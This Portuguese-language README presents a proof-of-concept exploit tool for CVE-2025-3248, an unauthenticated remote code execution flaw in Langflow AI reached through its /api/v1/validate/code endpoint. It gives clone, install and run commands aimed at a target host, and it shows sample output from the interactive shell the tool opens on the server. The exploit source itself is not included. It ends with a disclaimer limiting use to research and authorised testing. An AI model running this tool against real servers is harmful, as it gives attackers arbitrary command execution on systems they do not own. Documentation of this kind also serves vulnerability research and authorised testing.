
Exploit para Execução Remota de Código (Não Autenticado) no Langflow AI
Este exploit tem como alvo uma vulnerabilidade crítica de RCE não autenticada (CVE-2025-3248) no Langflow AI. A vulnerabilidade permite que um atacante execute comandos arbitrários do sistema no servidor alvo através do endpoint /api/v1/validate/code.
Esta ferramenta de prova de conceito (PoC) fornece um shell interativo para testar e demonstrar o problema.
pip3 para instalar dependênciasgit clone https://github.com/yourusername/CVE-2025-3248.git
cd CVE-2025-3248
pip3 install -r requirements.txt
python3 CVE-2025-3248.py -u http://TARGET_HOST:PORT
python3 CVE-2025-3248.py -u http://127.0.0.1:7860
Você receberá um shell interativo:
0xgh057r3c0n@root💀$ whoami
langflow
0xgh057r3c0n@root💀$ uname -a
Linux ubuntu 5.15.0-89-generic #99~20.04.1-Ubuntu SMP ...
exit ou quitEste projeto está licenciado sob a Licença MIT — veja o arquivo LICENSE para detalhes.
Este software é fornecido apenas para fins educacionais e de pesquisa. O autor não assume nenhuma responsabilidade por qualquer uso indevido deste código. Use apenas em sistemas que você possui ou para os quais tenha permissão explícita para testar.